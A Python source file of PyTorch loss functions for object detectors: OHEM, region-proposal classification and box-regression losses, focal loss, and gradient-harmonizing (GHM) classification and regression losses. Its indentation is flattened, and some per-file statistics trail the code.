def ohem_loss(batch_size, cls_pred, cls_target, loc_pred, loc_target, cls_type='softmax', smooth_l1_sigma=1.0):
"""
Arguments:
batch_size (int): number of sampled rois for bbox head training
loc_pred (FloatTensor): [R, 4], location of positive rois
loc_target (FloatTensor): [R, 4], location of positive rois
pos_mask (FloatTensor): [R], binary mask for sampled positive rois
cls_pred (FloatTensor): [R, C]
cls_target (LongTensor): [R]
Returns:
cls_loss, loc_loss (FloatTensor)
"""
if cls_type == 'softmax':
ohem_cls_loss = F.cross_entropy(cls_pred, cls_target, reduction='none', ignore_index=-1)
else:
ohem_cls_loss = F.binary_cross_entropy_with_logits(cls_pred, cls_target, reduction='none')
if loc_pred is None:
ohem_loc_loss = torch.zeros_like(ohem_cls_loss)
else:
ohem_loc_loss = smooth_l1_loss(loc_pred, loc_target, sigma=smooth_l1_sigma, reduce=False)
loss = ohem_cls_loss + ohem_loc_loss
sorted_ohem_loss, idx = torch.sort(loss, descending=True)
keep_num = min(sorted_ohem_loss.size()[0], batch_size)
if keep_num <= sorted_ohem_loss.size()[0]:
keep_idx_cuda = idx[:keep_num]
ohem_cls_loss = ohem_cls_loss[keep_idx_cuda]
ohem_loc_loss = ohem_loc_loss[keep_idx_cuda]
cls_loss = ohem_cls_loss.sum() / keep_num
loc_loss = ohem_loc_loss.sum() / keep_num
return cls_loss, loc_loss, keep_idx_cuda
def get_rpn_cls_loss(cls_pred, cls_target, sample_cls_mask, loss_type):
"""
Arguments:
cls_pred (FloatTensor): [B*K, C]
cls_target (LongTensor): [B*K]
sample_cls_mask (ByteTensor): [B, K], binary mask for sampled rois
loss_type (str): sigmoid or softmax
Returns:
cls_loss, acc (FloatTensor)
"""
sample_cls_mask = sample_cls_mask.reshape(-1)
if loss_type == "softmax":
cls_pred = cls_pred.reshape(cls_target.numel(), -1)
cls_target = cls_target.reshape(-1)
cls_loss = F.cross_entropy(cls_pred, cls_target.long(), ignore_index=-1)
acc = A.accuracy(cls_pred, cls_target)[0]
elif loss_type == "sigmoid":
cls_pred = cls_pred.reshape(-1)
cls_target = cls_target.reshape(-1)
normalizer = (sample_cls_mask > 0).float().sum()
normalizer = max(1, normalizer.item())
cls_loss = F.binary_cross_entropy_with_logits(cls_pred, cls_target.float(), reduction='none')
cls_loss = (cls_loss * sample_cls_mask.float()).sum() / normalizer
# acc = torch.tensor([0]).cuda().float() # for sigmoid, there is a bug in A.accuracy
acc = A.binary_accuracy(cls_pred, cls_target)[0]
return cls_loss, acc
def get_rpn_loc_loss(loc_pred, loc_target, sample_loc_mask, sigma, normalizer):
"""
Arguments:
loc_pred (FloatTensor): [B*K, 4]
loc_target (LongTensor): [B*K, 4]
sample_loc_mask (ByteTensor): [B, K], binary mask for sampled poitive rois
Returns:
loc_loss (FloatTensor)
"""
sample_loc_mask = sample_loc_mask.reshape(-1)
loc_target = loc_target.reshape(-1, 4)[sample_loc_mask]
loc_pred = loc_pred.reshape(-1, 4)[sample_loc_mask]
loc_loss = smooth_l1_loss(loc_pred, loc_target, sigma, normalizer=normalizer)
return loc_loss
def get_focal_loss(cls_pred, cls_target, normalizer, num_classes, cfg_loss):
"""
Arguments:
cls_pred (FloatTensor): [B*K, C]
cls_target (LongTensor): [B*K]
cfg_loss: config for focal loss
Returns:
cls_loss, acc (FloatTensor)
"""
alpha = cfg_loss['alpha']
gamma = cfg_loss['gamma']
loss_type = cfg_loss['type']
C = {'sigmoid': -1, 'softmax': 0}[loss_type] + num_classes
cls_pred = cls_pred.float().view(-1, C)
cls_target = cls_target.int().view(-1)
normalizer = torch.cuda.FloatTensor([normalizer])
loss_fn = {'sigmoid': E.SigmoidFocalLossFunction, 'softmax': E.SoftmaxFocalLossFunction}[loss_type]
loss_fn = loss_fn(gamma, alpha, C)
cls_loss = loss_fn(cls_pred, cls_target, normalizer)
if loss_type == 'softmax':
acc = A.accuracy(cls_pred, cls_target.long())[0]
elif loss_type == 'sigmoid':
acc = A.accuracy(cls_pred, cls_target.long() - 1, ignore_indices=[-1, -2])[0]
else:
raise NotImplementedError('{} is not supported for focal loss'.format(loss_type))
return cls_loss, acc
class FocalLoss(nn.Module):
def __init__(self, class_num, alpha=None, gamma=2, use_alpha=False, size_average=True):
super(FocalLoss, self).__init__()
self.class_num = class_num
self.alpha = alpha
self.gamma = gamma
if use_alpha:
self.alpha = torch.tensor(alpha).cuda()
self.softmax = nn.Softmax(dim=1)
self.use_alpha = use_alpha
self.size_average = size_average
def forward(self, pred, target):
prob = self.softmax(pred.view(-1,self.class_num))
prob = prob.clamp(min=0.0001,max=1.0)
target_ = torch.zeros(target.size(0),self.class_num).cuda()
target_.scatter_(1, target.view(-1, 1).long(), 1.)
if self.use_alpha:
batch_loss = - self.alpha.double() * torch.pow(1-prob,self.gamma).double() * prob.log().double() * target_.double()
else:
batch_loss = - torch.pow(1-prob,self.gamma).double() * prob.log().double() * target_.double()
batch_loss = batch_loss.sum(dim=1)
if self.size_average:
loss = batch_loss.mean()
else:
loss = batch_loss.sum()
return loss
class GHMCLoss(nn.Module):
def __init__(self, bins=10, momentum=0, loss_weight=1.0):
super(GHMCLoss, self).__init__()
self.bins = bins
self.momentum = momentum
self.edges = [float(x) / bins for x in range(bins + 1)]
self.edges[-1] += 1e-6
self.loss_weight = loss_weight
if momentum > 0:
self.acc_sum = [0.0 for _ in range(bins)]
def binarize_target(self, input, target):
""" convert target index to one-hot target
Args:
input: [B, A, C]
target: [B, A]
Returns:
target: [B, A, C]
mask: [B, A, C]
"""
binary_targets = torch.zeros_like(input)
mask = torch.zeros_like(input)
pos_inds = target > 0
cls_inds = target[pos_inds] - 1
binary_targets[pos_inds, cls_inds] = 1
mask[target > -1, :] = 1
return binary_targets, mask
def forward(self, input, target, mlvl_shapes=None):
""" Args:
input [batch_num, anchor_num, C]:
The direct prediction of classification fc layer.
target [batch_num, anchor_num]:
Binary target (0 or 1) for each sample each class. The value is -1
when the sample is ignored.
"""
target, mask = self.binarize_target(input, target)
if mlvl_shapes is None:
return self.forward_single(input, target, mask)
mlvl_size = [_[-1] for _ in mlvl_shapes]
assert input.ndimension() == 3
assert target.ndimension() == 3
assert mask.ndimension() == 3
inputs = input.split(mlvl_size, dim=1)
targets = target.split(mlvl_size, dim=1)
masks = mask.split(mlvl_size, dim=1)
loss = 0
for i, t, m in zip(inputs, targets, masks):
loss += self.forward_single(i, t, m)
return loss
def forward_single(self, input, target, mask):
edges = self.edges
mmt = self.momentum
weights = torch.zeros_like(input)
# gradient length
g = torch.abs(input.sigmoid().detach() - target)
valid = mask > 0
tot = max(valid.float().sum().item(), 1.0)
n = 0 # n valid bins
for i in range(self.bins):
inds = (g >= edges[i]) & (g < edges[i + 1]) & valid
num_in_bin = inds.sum().item()
if num_in_bin > 0:
if mmt > 0:
self.acc_sum[i] = mmt * self.acc_sum[i] \
+ (1 - mmt) * num_in_bin
weights[inds] = tot / self.acc_sum[i]
else:
weights[inds] = tot / num_in_bin
n += 1
if n > 0:
weights = weights / n
loss = F.binary_cross_entropy_with_logits(input, target, weights, reduction='sum') / tot
return loss * self.loss_weight
@classmethod
def from_params(cls, params):
bins = params['bins']
momentum = params['momentum']
loss_weight = params['loss_weight']
return cls(bins, momentum, loss_weight)
class GHMRLoss(nn.Module):
def __init__(self, mu=0.02, bins=10, momentum=0, loss_weight=1.0):
super(GHMRLoss, self).__init__()
self.mu = mu
self.bins = bins
self.edges = [float(x) / bins for x in range(bins + 1)]
self.edges[-1] = 1e3
self.momentum = momentum
self.loss_weight = loss_weight
if momentum > 0:
self.acc_sum = [0.0 for _ in range(bins)]
def forward(self, input, target, mask, mlvl_shapes=None):
""" Args:
input [batch_num, anchor_num, 4]:
The prediction of box regression layer. Channel number can be 4 or
(4 * class_num) depending on whether it is class-agnostic.
target [batch_num, anchor_num, 4]:
The target regression values with the same size of input.
mask [batch_num, anchor_num]: mask for each anchor
"""
# expand to each coordinate
mask = mask.float().reshape(input.shape[0], input.shape[1], 1).repeat(1, 1, 4)
if mlvl_shapes is None:
return self.forward_single(input, target, mask)
mlvl_size = [_[-1] for _ in mlvl_shapes]
assert input.ndimension() == 3
assert target.ndimension() == 3
assert mask.ndimension() == 3
inputs = input.split(mlvl_size, dim=1)
targets = target.split(mlvl_size, dim=1)
masks = mask.split(mlvl_size, dim=1)
loss = 0
for i, t, m in zip(inputs, targets, masks):
loss += self.forward_single(i, t, m)
return loss
def forward_single(self, input, target, mask):
mu = self.mu
edges = self.edges
mmt = self.momentum
# ASL1 loss
diff = input - target
loss = torch.sqrt(diff * diff + mu * mu) - mu
# gradient length
g = torch.abs(diff / torch.sqrt(mu * mu + diff * diff)).detach()
weights = torch.zeros_like(g)
valid = mask > 0
tot = max(mask.float().sum().item(), 1.0)
n = 0 # n: valid bins
for i in range(self.bins):
inds = (g >= edges[i]) & (g < edges[i + 1]) & valid
num_in_bin = inds.sum().item()
if num_in_bin > 0:
n += 1
if mmt > 0:
self.acc_sum[i] = mmt * self.acc_sum[i] \
+ (1 - mmt) * num_in_bin
weights[inds] = tot / self.acc_sum[i]
else:
weights[inds] = tot / num_in_bin
if n > 0:
weights /= n
loss = loss * weights
loss = loss.sum() / tot
return loss * self.loss_weight
@classmethod
def from_params(cls, params):
mu = params['mu']
bins = params['bins']
momentum = params['momentum']
loss_weight = params['loss_weight']
return cls(mu, bins, momentum, loss_weight)
| 35.043147
| 127
| 0.599768
| 7,140
| 0.517129
| 0
| 0
| 442
| 0.032013
| 0
| 0
| 2,536
| 0.183675
|